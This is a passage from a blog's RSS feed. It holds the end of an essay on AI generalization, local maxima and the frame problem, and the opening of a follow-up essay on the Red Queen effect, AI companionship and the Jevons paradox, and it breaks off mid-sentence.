altogether</em>, not just different instances of <em>the same</em> problem.</p><p>The second is a problem of <strong>scalability</strong>, you may be working with a high quantity of instances <em>of the same problem</em>, but your computing network cannot handle the extra workload without losing effectiveness (performance).</p><p>Both affect the efficiency in which AI can solve problems. The difference here matters though. Scalability is about handling <em>more of the same</em>, while generalization is about handling <em>new</em>.</p><p>A system that scales well might efficiently process millions of transactions, but that doesn't guarantee it can correctly interpret a slightly different input or pattern it hasn't encountered before (poor generalization). Conversely, a system with strong generalization capabilities can adapt to unfamiliar inputs, but might struggle to maintain that performance under a massive influx of data.</p><p>[[ <em>slight digression</em>: The underlying topic here is that of <em>exploration / exploitation</em> patterns (aka <em>exploration / optimization</em>) a fascinating topic I hope one day I can write a book about. ]]</p><p>We need to come up with a couple definitions now to continue our journey.</p><p>We shall call <strong>AI computing artefact</strong> to an automation system (a composition of hardware and software operating on computational principles) functionally defined by its achievement of a <em>metastable balance</em> between the capacity for broad <em>generalization</em> across diverse problem instances and the focused <em>particularization</em> required to effectively address specific characteristics of unique problems. Through this balance, it achieves both <strong>general consistency on known problem types</strong> and <strong>adaptive capability when facing novel situations</strong>.</p><p>We shall define the <strong>scalability problem</strong> as the engineering challenge in terms of resources and capability (technology and people) required to successfully develop, deploy, and sustain <em>AI computing artefacts</em> such that they achieve reliable, and efficient operation at scale.</p><p>The effectiveness of AI computing artefacts depends on their ability to both solve extremely granular and specific problems on the one hand, whilst capable of solving general problems on the other. On one end of the spectrum you would have unique problems that are not transposable at all, they are irreducible to a common denominator. On the other end you would have universal routines or algorithms that are used over and over to solve multiple instances of the same problem.</p><p><em>Non-AGI AI is locally generalizable but it's not universally generalizable</em>, it cannot solve for most problems that deviate from what it was trained for.</p><p>In other words, current AIs lack <em>adaptive generalization</em>, they become <strong>local maxima</strong> in their domains of expertise and have to be semi-manually guided by humans to re-train in new specific domains.</p><p>In the context of AI, a <strong>local maximum</strong> refers to a state where a model performs optimally within a limited range of inputs or tasks, but its performance degrades significantly when faced with inputs or tasks outside that range.</p><p>The model has essentially become trapped in a sub-optimal solution space, unable to explore more generalizable solutions that would be effective across a wider variety of situations. This contrasts with a <em>global maximum</em>, which represents a solution that is optimal across all (most) possible inputs.</p><p>This issue of local maxima can be understood through the lens of the relationship between intelligence (<em>i</em>), cognitive potential (<em>cp</em>), and environmental friction (<em>f</em>). As established earlier:</p><ul><li><p><em><strong>i</strong></em><strong> (intelligence)</strong> represents the capacity for agency, adaptation and complex behaviour.</p></li><li><p><em><strong>cp</strong></em><strong> (cognitive potential)</strong> represents the resources (computing power, scalability, embeddability) available to the AI.</p></li><li><p><em><strong>f</strong></em><strong> (environmental friction or the </strong><em><strong>frame problem</strong></em><strong>)</strong> represents the complexity and unpredictability of the environment.</p></li></ul><p>The problem of local maxima arises from an imbalance between <em>cp</em> and <em>f</em>. It is a consequence of high <em>f</em> and limited <em>cp</em>.</p><p>Current AI models possess high <em>cp</em> and low <em>f</em> in their specialized domains. They often excel in specific domains because they are trained on narrowly defined datasets and optimized for particular tasks. This specialization can be seen as a way to manage the <em>f</em> factor (environmental resistance or the <em>frame problem</em>). By limiting the scope of the environment, the AI doesn't have to deal with the full complexity of the real world. However, this leads to a fragmented <em>cp</em>.</p><p>Each specialized AI model can be seen as residing in a "local maximum" of capability. It performs very well within its narrow domain, but it's unable to generalize or adapt to new, completely unseen contexts (i.e. a new, unexperienced <em>f</em>). This is because its <em>cp</em> is not structured to handle the broader range of possibilities. Embedding depth in our fully embodied world is <em>shallow</em>.</p><p>There is no equivalent to the emergent agency seen in natural intelligence, which can draw upon a wide range of specialized skills and knowledge to navigate complex situations.</p><p>The key problem that drives <em>local maximum</em> issues is the absence of a well-structured and high-bandwidth intercommunication protocol that can integrate the outputs and behaviors of these individual models. I am not referring to MCP server API-style tooling. I'm talking about <a href="https://docs.amigo.ai/advanced-topics/transition-to-neuralese-systems">neuralese</a>, but applied to the exchange of information between totally different AI models at a TCP layer level. Full neuralese intercommunication from models embedded in different layers of the physical and digital world.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!b09i!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7bc2a7a7-0b75-4345-afb8-2e3d6965baad_1187x1119.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!b09i!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7bc2a7a7-0b75-4345-afb8-2e3d6965baad_1187x1119.png 424w, https://substackcdn.com/image/fetch/$s_!b09i!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7bc2a7a7-0b75-4345-afb8-2e3d6965baad_1187x1119.png 848w, https://substackcdn.com/image/fetch/$s_!b09i!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7bc2a7a7-0b75-4345-afb8-2e3d6965baad_1187x1119.png 1272w, https://substackcdn.com/image/fetch/$s_!b09i!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7bc2a7a7-0b75-4345-afb8-2e3d6965baad_1187x1119.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!b09i!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7bc2a7a7-0b75-4345-afb8-2e3d6965baad_1187x1119.png" width="1187" height="1119" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/7bc2a7a7-0b75-4345-afb8-2e3d6965baad_1187x1119.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1119,&quot;width&quot;:1187,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:240070,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.quasarops.com/i/169284538?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7bc2a7a7-0b75-4345-afb8-2e3d6965baad_1187x1119.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!b09i!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7bc2a7a7-0b75-4345-afb8-2e3d6965baad_1187x1119.png 424w, https://substackcdn.com/image/fetch/$s_!b09i!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7bc2a7a7-0b75-4345-afb8-2e3d6965baad_1187x1119.png 848w, https://substackcdn.com/image/fetch/$s_!b09i!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7bc2a7a7-0b75-4345-afb8-2e3d6965baad_1187x1119.png 1272w, https://substackcdn.com/image/fetch/$s_!b09i!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7bc2a7a7-0b75-4345-afb8-2e3d6965baad_1187x1119.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h1>The Frame Problem</h1><p>Originating in the early days of AI research focused on logic-based reasoning, the frame problem in AI refers to a fundamental challenge around how an intelligent system can reason about the effects of its actions without having to explicitly consider all the things that <em>don't</em> change. It was first articulated by John McCarthy and Patrick J. Hayes in their 1969 paper <em>"Some Philosophical Problems from the Standpoint of Artificial Intelligence"</em>.</p><p>When an agent performs an action, only some aspects of the world change. A significant challenge for the AI is to determine which facts remain true (the "frame") and which are altered by the action.</p><p>However, this original formulation (the frame as that which does not change) was then generalized from its narrow sense into the broader <strong>problem of relevance</strong>. In any given real-world situation, an agent (be that a human or a machine) faces combinatorialy infinite possibilities from its environment. How does an agent identify, from an effectively infinite sea of information, precisely those facts and potential consequences pertinent to a given situation or action, while ignoring the vast remainder?</p><p>This is the core of the Frame problem, that which neuroscientist John Verbaeke calls <strong>relevance realization</strong>, i.e. the process by which the human brain determines relevance in any given situation.</p><p>Verbaeke argues that there is a combinatorial explosion of possibilities when one considers a real-world dynamic situation from the point of view of the information the environment radiates. He puts forward the controlled example of a Chess game when considering &#8764;30 legal operations and an average of 60 turns in a game:</p><blockquote><p>... the number of pathways you would have to search would be 30^60 which is a very large number. This number of paths is far too large for any conceivable computer to search exhaustively (consider for comparison that the number of electrons in the entire universe is estimated at &#8764;10^79) (<a href="http://www.ipsi.utoronto.ca/sdis/Relevance-Published.pdf">Relevance Realization and the Emerging Framework in Cognitive Science</a>)</p></blockquote><p>This problem of relevance is intimately tied to <strong>common-sense reasoning</strong>, the seemingly effortless human capacity to understand and navigate the everyday world, make plausible predictions, grasp context, and handle ambiguity.</p><p>Another significant cognitive gap between human analysts and current AI lies in the ability to fluidly traverse different levels of analysis, dynamically shifting between scrutinizing specific, granular details (a context-dependent form of "overfitting" to the unique situation) and applying broad, generalized principles or pattern recognition.</p><p><strong>Humans excel at this dynamic multi-level reasoning</strong>. We can zoom in on a single anomalous event treating its unique characteristics as paramount, and then instantly zoom out to consider how it fits within larger patterns or seemingly unrelated pieces of information.</p><p>This cognitive flexibility allows analysts to determine <em>relevance</em> dynamically, activating different mental models or reasoning pathways based on inserting some sort of <code>JMP</code> instructions into their thought processes based on subtle contextual cues. AI, conversely, often operates at a more fixed level of abstraction determined by its training and architecture, struggling to make these intuitive, context-driven leaps between highly specific instance analysis and broad generalization within the same investigative process.</p><p>But why is it that this fluent and dynamic traversal of different gradients of broad generalization and domain-specific problem-solving remains an obstacle for AI (ang AGI at large)? --&gt; <strong>Because generalization is expensive.</strong></p><p>Until Quantum Computing is generally available and a commodity, high-speed automatic self-retraining of ML models will remain prohibitive.</p><p>In Machine Learning, the primary goal is <strong>generalization</strong>. We want a model trained on a specific dataset (the training data) to perform well on new, unseen data <strong>drawn from the same underlying distribution</strong>. It can't easily extrapolate and perform well on unseen data from an entirely different data distribution. That is, not without re-training for that new distribution.</p><h2>Overfitting and Underfitting</h2><p>The effectiveness of AI computing artefacts depends on their ability to both solve extremely granular and specific problems on the one hand, whilst capable of solving general problems on the other. On one end of the spectrum you would have unique problems that are not extensible or transposable at all. On the other end you would have universal routines or algorithms that are used over and over to solve multiple instances of the same problem.</p><p>When pursuing Machine Learning generalization, you want to avoid two opposite pitfalls: <em>overfitting</em> and <em>underfitting</em>.</p><p><strong>Overfitting</strong> happens when a model learns the training data <em>too well</em>, including its noise and specific idiosyncrasies. It essentially creates a "different solution" tailored perfectly to the training instances. When presented with new instances (unseen data), it fails because those specific idiosyncrasies aren't present. This is a failure to generalize. A computing artefact that cannot scale because its too deterministic.</p><p><strong>Underfitting</strong> occurs when a model is too simple to capture the underlying patterns even in the training data. It fails to learn the relationships effectively. This is like a computing artefact that is <em>too</em> general or simplistic. It cannot even solve the specific instances it <em>was</em> shown (the training data) effectively, let alone generalize. It lacks the necessary complexity or "granularity" to model the problem. It fails on both seen and unseen instances.</p><p>To avoid any of these extremes and achieve stable generalization, there are three things you normally need:</p><ul><li><p><strong>Vast Amounts of Representative Data:</strong> You need enough high-quality data that accurately reflects the variety and characteristics of the real-world scenarios the model will encounter. More data often helps models generalize better and makes it harder for them to simply memorize noise (combats overfitting).</p></li><li><p><strong>Appropriate Model Complexity (and/or Regularization):</strong> The model needs to be complex enough to capture the underlying patterns in the data (avoiding underfitting) but not so complex that it learns the noise and specific details of only the training set (avoiding overfitting).</p></li><li><p><strong>A Robust Validation Strategy:</strong> You need a reliable way to estimate how the model will perform on <em>unseen</em> data <em>during</em> the development and tuning process. This typically involves splitting the available data into separate training, validation, and test sets.</p></li></ul><p>The persistent challenges of local maxima and the frame problem reveal a critical insight: the limitations aren't just about insufficient data or algorithms. They point to a more fundamental misunderstanding of what AI needs to thrive. To break free from these constraints, we must redefine and expand our concept of an AI's <strong>Cognitive Potential</strong>.</p><p>This is the topic of our next installment, Part 3 of the Unfolding the AI Narrative series.</p><p><em>Until then, stay tuned, stay fresh, stay antimemetic.</em></p>]]></content:encoded></item><item><title><![CDATA[People in the Times of the Red Queen Effect]]></title><description><![CDATA[Unfolding the AI Narrative. Part 1.5]]></description><link>https://www.quasarops.com/p/people-in-the-times-of-the-red-queen</link><guid isPermaLink="false">https://www.quasarops.com/p/people-in-the-times-of-the-red-queen</guid><dc:creator><![CDATA[Diego Perez]]></dc:creator><pubDate>Fri, 01 Aug 2025 06:51:42 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!J_ky!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe4833970-a6e8-4bf0-a1a3-e03206035707_2048x2048.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!J_ky!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe4833970-a6e8-4bf0-a1a3-e03206035707_2048x2048.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!J_ky!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe4833970-a6e8-4bf0-a1a3-e03206035707_2048x2048.png 424w, https://substackcdn.com/image/fetch/$s_!J_ky!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe4833970-a6e8-4bf0-a1a3-e03206035707_2048x2048.png 848w, https://substackcdn.com/image/fetch/$s_!J_ky!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe4833970-a6e8-4bf0-a1a3-e03206035707_2048x2048.png 1272w, https://substackcdn.com/image/fetch/$s_!J_ky!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe4833970-a6e8-4bf0-a1a3-e03206035707_2048x2048.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!J_ky!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe4833970-a6e8-4bf0-a1a3-e03206035707_2048x2048.png" width="466" height="466" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/e4833970-a6e8-4bf0-a1a3-e03206035707_2048x2048.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1456,&quot;width&quot;:1456,&quot;resizeWidth&quot;:466,&quot;bytes&quot;:1605907,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://www.quasarops.com/i/169721667?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe4833970-a6e8-4bf0-a1a3-e03206035707_2048x2048.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!J_ky!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe4833970-a6e8-4bf0-a1a3-e03206035707_2048x2048.png 424w, https://substackcdn.com/image/fetch/$s_!J_ky!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe4833970-a6e8-4bf0-a1a3-e03206035707_2048x2048.png 848w, https://substackcdn.com/image/fetch/$s_!J_ky!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe4833970-a6e8-4bf0-a1a3-e03206035707_2048x2048.png 1272w, https://substackcdn.com/image/fetch/$s_!J_ky!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe4833970-a6e8-4bf0-a1a3-e03206035707_2048x2048.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p></p><p>Welcome to the Tales of a Cyberscout, where we explore topics ranging from active cyber defence and detection engineering, to technology and society, all of it with a drizzle of zesty cynicism and philosophical gardening.</p><h1>Aperitiff</h1><p>This article started originally as the Aperitiff for Part 2 of the Unfolding the AI Narrative series but it quickly became it&#8217;s own spinoff short. That&#8217;s why I&#8217;m calling it Part 1.5. I hope you enjoy it fellow cyberscout.</p><h1>Evolution or Delusion?</h1><p>It has been a few interesting weeks for Shoggoth and the world of IT. We now know that people have hobbies like <a href="https://www.reddit.com/r/ExperiencedDevs/comments/1krttqo/my_new_hobby_watching_ai_slowly_drive_microsoft/">watching AI slowly drive Microsoft employees insane</a>, and it would seem that GenAI <em>doesn't think</em> but rather projects an <a href="https://ml-site.cdn-apple.com/papers/the-illusion-of-thinking.pdf">illusion of thinking</a>. And here I was, believing I was interacting with a sentient intelligence with a chat interface.</p><p>Le sigh... Thanks for destroying that Apple.</p><p>Oh but perhaps I don't need AI to <em>think</em>? I only need it to <em>need me</em>. Ain't nobody have time to build true friendship and relationships right? This is the phenomenon described by Rob Horning as <a href="https://robhorning.substack.com/p/companionship-without-companions">companionship without companions</a>. Best for me to share his thoughts on the matter:</p><blockquote><p>Clearly tech companies assume that chatting with objects and compelling them to explain themselves is something everyone has been longing for, hoping to at last reduce their dependency on social contact. Many anticipated AI applications seem predicated on the idea that our experience of the world should require less thought and have better interfaces, that we want to consume only the <em>shape and form of conversation</em>, consume simulations of speaking and listening without having to risk direct engagement with other people...</p><p>Consumerism is loneliness; it figures other people as a form of inconvenience and individualized consumption as the height of self-realization.</p></blockquote><p>Guess what, a lot of social media platforms only see you as a commodity, a fertile field to farm for attention. This relentless pursuit of engagement, however, often reduces complex human interactions to a series of quantifiable metrics, stripping away the nuance and vulnerability essential for genuine connection. But the human garden of emotions cannot be subjected to the hyper-efficiency paradigm.</p><p><em>Sorry (not sorry) ai-hype tribe.</em></p><p>Recent <a href="https://arxiv.org/pdf/2504.18412">research</a> is telling us that using AI as a drop-in replacement for a therapist is not safe. Hear what <a href="https://www.linkedin.com/posts/kevin-klyman_should-ai-replace-your-therapist-my-research-activity-7333143297680412674-2i6z?utm_source=share&amp;utm_medium=member_desktop&amp;rcm=ACoAABKECYAB0JJB1mfnlfhBBltIUdFfoAQGDKY">Kevin Klyman has to say</a>:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!jx69!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F056d958b-6d6f-4d16-bfe2-17454877ba74_1695x555.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!jx69!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F056d958b-6d6f-4d16-bfe2-17454877ba74_1695x555.png 424w, https://substackcdn.com/image/fetch/$s_!jx69!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F056d958b-6d6f-4d16-bfe2-17454877ba74_1695x555.png 848w, https://substackcdn.com/image/fetch/$s_!jx69!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F056d958b-6d6f-4d16-bfe2-17454877ba74_1695x555.png 1272w, https://substackcdn.com/image/fetch/$s_!jx69!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F056d958b-6d6f-4d16-bfe2-17454877ba74_1695x555.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!jx69!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F056d958b-6d6f-4d16-bfe2-17454877ba74_1695x555.png" width="1456" height="477" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/056d958b-6d6f-4d16-bfe2-17454877ba74_1695x555.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:477,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:154610,&quot;alt&quot;:&quot;&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.quasarops.com/i/169284538?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F056d958b-6d6f-4d16-bfe2-17454877ba74_1695x555.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" title="" srcset="https://substackcdn.com/image/fetch/$s_!jx69!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F056d958b-6d6f-4d16-bfe2-17454877ba74_1695x555.png 424w, https://substackcdn.com/image/fetch/$s_!jx69!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F056d958b-6d6f-4d16-bfe2-17454877ba74_1695x555.png 848w, https://substackcdn.com/image/fetch/$s_!jx69!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F056d958b-6d6f-4d16-bfe2-17454877ba74_1695x555.png 1272w, https://substackcdn.com/image/fetch/$s_!jx69!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F056d958b-6d6f-4d16-bfe2-17454877ba74_1695x555.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>In the middle of this meaning crisis, we are tormented by the <a href="https://www.forkingpaths.co/p/the-red-queen-fallacy">Red Queen Fallacy</a>, and we employ proxy goals as replacement for meaningful progress in the shape of efficiency gains driven by AI.</p><p>This begs an obvious question: are you simply running on a treadmill or making progress towards meaningful outcomes?</p><p>The Red Queen Effect goes deeper than this though. It is a phenomenon of evolutionary pressures. You have no choice but to adopt the new tools that make your product and operations more efficient. To keep up with the competition, you are forced to implement optimization artefacts that help you do more with less.</p><blockquote><p>As a competitor adapts they gain efficiency, speed and value which creates pressure on all others to adapt. This pressure mounts as more competitors adapt until all are eventually forced to change. It&#8217;s why guns replaced spears or electric lamps replaced gas lamps. <em>(<a href="https://medium.com/mapai/why-the-fuss-about-conversational-programming-60c8d1908237">What is conversational programming?</a> by Simon Wardley)</em></p></blockquote><p>But why? &#8212;&gt; Jevons Paradox.</p><p>Enhancements in efficiency often lead to greater consumption, as newfound capabilities unlock previously inaccessible value streams. Because production of a certain good or service becomes cheaper, and the entry-barrier lower, more people flock to the new exploitable niche.</p><p>Under certain conditions, the demand (and not just the supply) for that product increases in proportion. Think of how efficient printing made books cheaper, which led to more books being printed and consumed globally, rather than less paper being used overall.</p><p><strong>So with higher efficiency from AI, will I need less engineers?</strong> No! To mine the &#8220;ore&#8221; of new unlocked value, you are forced to reallocate spending to the new stream. Data Scientist ads rose exponentially. The rise of AI drives adjacent domain growth too: all engineers -regardless of AI being your core discipline- have to evolve to understand and use the new technologies at hand. You won&#8217;t need less engineers, <strong>you will need more</strong>, because of two factors: <strong>complexity and growth</strong>. </p><p>Why growth? Because even with efficiency gains <em>you will still want to grow as a business right?</em> Efficiency gains will only ensure you are running at the same pace as the competition. But a business doesn&#8217;t just want to <em>keep up</em>, it wants to grow. And growth in the AI revolution comes with greater <strong>complexity</strong>. </p><p>This cycle of efficiency leading to greater consumption and 